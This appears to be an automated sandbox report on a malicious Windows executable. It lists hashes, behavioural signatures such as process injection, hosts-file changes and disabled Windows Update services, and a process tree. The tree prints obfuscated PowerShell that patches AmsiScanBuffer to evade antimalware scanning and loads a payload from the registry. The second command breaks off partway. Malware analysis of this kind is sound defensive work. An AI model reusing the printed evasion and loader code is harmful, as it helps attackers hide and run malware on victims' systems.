Analysis
-
max time kernel
85s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30/01/2023, 19:09
Static task
static1
Behavioral task
behavioral1
Sample
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
Resource
win10v2004-20220812-en
General
-
Target
b405694fbedc3ed57f486a0bd892fb48b2917d49.exe
-
Size
360KB
-
MD5
9c0c75bb31dfa46b2c91c12693bf45dd
-
SHA1
b405694fbedc3ed57f486a0bd892fb48b2917d49
-
SHA256
c332e200a4050d2b0e7cb33ddbed8e8cd6caff60653cb30a1f76bec08031cbbe
-
SHA512
cc666cfd32f070b859bdfcb5391fe160a7456c00426e806736a459044205558a579d45092eedaf31a90a90ccd0957948bccce248bbc5cdcef7f5885f44e37b44
-
SSDEEP
6144:FUzcknZ/qA5koqdrF7ENQ8zxT8iz5ZhHS7gVFy6d3bBum+WOmekGAOIA40e8aHc:FUwg/qA5Zz28zxT8yZZSUVFV14kG+0e2
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4016 created 2984 4016 SmartDefRun.exe 54 PID 4016 created 2984 4016 SmartDefRun.exe 54 PID 4016 created 2984 4016 SmartDefRun.exe 54 PID 4016 created 2984 4016 SmartDefRun.exe 54 PID 4164 created 580 4164 powershell.EXE 5 -
Blocklisted process makes network request 3 IoCs
flow pid Process 11 1532 powershell.exe 16 1532 powershell.exe 26 1532 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 2 IoCs
pid Process 4016 SmartDefRun.exe 4924 SysApp.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2136 set thread context of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 4016 set thread context of 2216 4016 SmartDefRun.exe 104 PID 4164 set thread context of 3408 4164 powershell.EXE 109 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1620 sc.exe 2188 sc.exe 5068 sc.exe 4948 sc.exe 116 sc.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 928 2136 WerFault.exe 76 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 1532 powershell.exe 1532 powershell.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4924 SysApp.exe 4016 SmartDefRun.exe 4016 SmartDefRun.exe 3184 powershell.exe 3184 powershell.exe 4016 SmartDefRun.exe 4016 SmartDefRun.exe 4016 SmartDefRun.exe 4016 SmartDefRun.exe 1068 powershell.exe 1068 powershell.exe 4016 SmartDefRun.exe 4016 SmartDefRun.exe 988 powershell.EXE 4164 powershell.EXE 4164 powershell.EXE 988 powershell.EXE 4164 powershell.EXE 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeSystemEnvironmentPrivilege 1068 powershell.exe Token: SeRemoteShutdownPrivilege 1068 powershell.exe Token: SeUndockPrivilege 1068 powershell.exe Token: SeManageVolumePrivilege 1068 powershell.exe Token: 33 1068 powershell.exe Token: 34 1068 powershell.exe Token: 35 1068 powershell.exe Token: 36 1068 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeSystemEnvironmentPrivilege 1068 powershell.exe Token: SeRemoteShutdownPrivilege 1068 powershell.exe Token: SeUndockPrivilege 1068 powershell.exe Token: SeManageVolumePrivilege 1068 powershell.exe Token: 33 1068 powershell.exe Token: 34 1068 powershell.exe Token: 35 1068 powershell.exe Token: 36 1068 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeSystemEnvironmentPrivilege 1068 powershell.exe Token: SeRemoteShutdownPrivilege 1068 powershell.exe Token: SeUndockPrivilege 1068 powershell.exe Token: SeManageVolumePrivilege 1068 powershell.exe Token: 33 1068 powershell.exe Token: 34 1068 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2136 wrote to memory of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 2136 wrote to memory of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 2136 wrote to memory of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 2136 wrote to memory of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 2136 wrote to memory of 544 2136 b405694fbedc3ed57f486a0bd892fb48b2917d49.exe 78 PID 544 wrote to memory of 1532 544 vbc.exe 82 PID 544 wrote to memory of 1532 544 vbc.exe 82 PID 544 wrote to memory of 1532 544 vbc.exe 82 PID 1532 wrote to memory of 4016 1532 powershell.exe 86 PID 1532 wrote to memory of 4016 1532 powershell.exe 86 PID 1532 wrote to memory of 4924 1532 powershell.exe 87 PID 1532 wrote to memory of 4924 1532 powershell.exe 87 PID 1532 wrote to memory of 4924 1532 powershell.exe 87 PID 1464 wrote to memory of 1620 1464 cmd.exe 94 PID 1464 wrote to memory of 1620 1464 cmd.exe 94 PID 1464 wrote to memory of 2188 1464 cmd.exe 95 PID 1464 wrote to memory of 2188 1464 cmd.exe 95 PID 1464 wrote to memory of 5068 1464 cmd.exe 96 PID 1464 wrote to memory of 5068 1464 cmd.exe 96 PID 1464 wrote to memory of 4948 1464 cmd.exe 97 PID 1464 wrote to memory of 4948 1464 cmd.exe 97 PID 1464 wrote to memory of 116 1464 cmd.exe 98 PID 1464 wrote to memory of 116 1464 cmd.exe 98 PID 1464 wrote to memory of 1280 1464 cmd.exe 99 PID 1464 wrote to memory of 1280 1464 cmd.exe 99 PID 1464 wrote to memory of 3884 1464 cmd.exe 100 PID 1464 wrote to memory of 3884 1464 cmd.exe 100 PID 1464 wrote to memory of 3056 1464 cmd.exe 101 PID 1464 wrote to memory of 3056 1464 cmd.exe 101 PID 1464 wrote to memory of 3528 1464 cmd.exe 102 PID 1464 wrote to memory of 3528 1464 cmd.exe 102 PID 1464 wrote to memory of 1840 1464 cmd.exe 103 PID 1464 wrote to memory of 1840 1464 cmd.exe 103 PID 4016 wrote to memory of 2216 4016 SmartDefRun.exe 104 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 4164 wrote to memory of 3408 4164 powershell.EXE 109 PID 3408 wrote to memory of 580 3408 dllhost.exe 5 PID 3408 wrote to memory of 668 3408 dllhost.exe 7 PID 3408 wrote to memory of 952 3408 dllhost.exe 17 PID 3408 wrote to memory of 312 3408 dllhost.exe 10 PID 3408 wrote to memory of 396 3408 dllhost.exe 11 PID 3408 wrote to memory of 624 3408 dllhost.exe 16 PID 3408 wrote to memory of 812 3408 dllhost.exe 12 PID 3408 wrote to memory of 1032 3408 dllhost.exe 15 PID 3408 wrote to memory of 1084 3408 dllhost.exe 13 PID 3408 wrote to memory of 1184 3408 dllhost.exe 18 PID 3408 wrote to memory of 1296 3408 dllhost.exe 21 PID 3408 wrote to memory of 1308 3408 dllhost.exe 22 PID 3408 wrote to memory of 1360 3408 dllhost.exe 23 PID 3408 wrote to memory of 1372 3408 dllhost.exe 24 PID 3408 wrote to memory of 1396 3408 dllhost.exe 25 PID 3408 wrote to memory of 1412 3408 dllhost.exe 27 PID 3408 wrote to memory of 1448 3408 dllhost.exe 26 PID 3408 wrote to memory of 1592 3408 dllhost.exe 28 PID 3408 wrote to memory of 1652 3408 dllhost.exe 29 PID 3408 wrote to memory of 1660 3408 dllhost.exe 30 PID 3408 wrote to memory of 1676 3408 dllhost.exe 31
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:580
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:312
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{78ce01b5-2c9c-42b9-99cc-6e7233f651f3}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3408
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1084
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:ubKbLenjsUrq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IfvRRdBSKMwYLO,[Parameter(Position=1)][Type]$CxXVaKjOge)$TvVLTrCVGOa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+'e'+'T'+'y'+''+'p'+'e','C'+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+'s'+'i'+'C'+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$TvVLTrCVGOa.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+'e'+''+'c'+''+'i'+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+''+[Char](101)+''+','+''+[Char](72)+'i'+[Char](100)+'e'+'B'+''+'y'+'S'+'i'+''+[Char](103)+''+','+''+'P'+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IfvRRdBSKMwYLO).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+'g'+'ed');$TvVLTrCVGOa.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+'S'+'i'+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$CxXVaKjOge,$IfvRRdBSKMwYLO).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $TvVLTrCVGOa.CreateType();}$lyYwPByhhQmNl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+'f'+'el'+'y'+''+[Char](89)+''+[Char](119)+''+[Char](80)+''+[Char](66)+''+[Char](121)+''+'h'+'hQm'+'N'+''+[Char](108)+'');$KbLNTLOWflVlXM=$lyYwPByhhQmNl.GetMethod('Kb'+[Char](76)+'N'+[Char](84)+''+[Char](76)+''+[Char](79)+''+[Char](87)+''+'f'+'lVl'+[Char](88)+'M',[Reflection.BindingFlags]'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hgLTkKsmGODYnDAWoPa=ubKbLenjsUrq @([String])([IntPtr]);$MuOFUvyEufZHcZDVCevwKK=ubKbLenjsUrq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$udKlMpMOwDi=$lyYwPByhhQmNl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+'eH'+[Char](97)+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LylqIwOwNJpANG=$KbLNTLOWflVlXM.Invoke($Null,@([Object]$udKlMpMOwDi,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$kzxvZVDtReFFDIllG=$KbLNTLOWflVlXM.Invoke($Null,@([Object]$udKlMpMOwDi,[Object]('V'+[Char](105)+'rtua'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+'t'+'e'+'c'+''+[Char](116)+'')));$tzXLDsJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LylqIwOwNJpANG,$hgLTkKsmGODYnDAWoPa).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$DcSUTjaGhLApQzJyi=$KbLNTLOWflVlXM.Invoke($Null,@([Object]$tzXLDsJ,[Object]('Am'+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$ucQfodpMHO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kzxvZVDtReFFDIllG,$MuOFUvyEufZHcZDVCevwKK).Invoke($DcSUTjaGhLApQzJyi,[uint32]8,4,[ref]$ucQfodpMHO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$DcSUTjaGhLApQzJyi,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kzxvZVDtReFFDIllG,$MuOFUvyEufZHcZDVCevwKK).Invoke($DcSUTjaGhLApQzJyi,[uint32]8,0x20,[ref]$ucQfodpMHO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+'s'+'t'+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CiUNqoTXXwiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TFqzdZTyRKKeEw,[Parameter(Position=1)][Type]$CArfIvDcqV)$WhRLihQIKyT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nMe'+[Char](109)+''+'o'+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WhRLihQIKyT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+''+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TFqzdZTyRKKeEw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$WhRLihQIKyT.DefineMethod(''+[Char](73)+'n'+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+'c'+',H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](1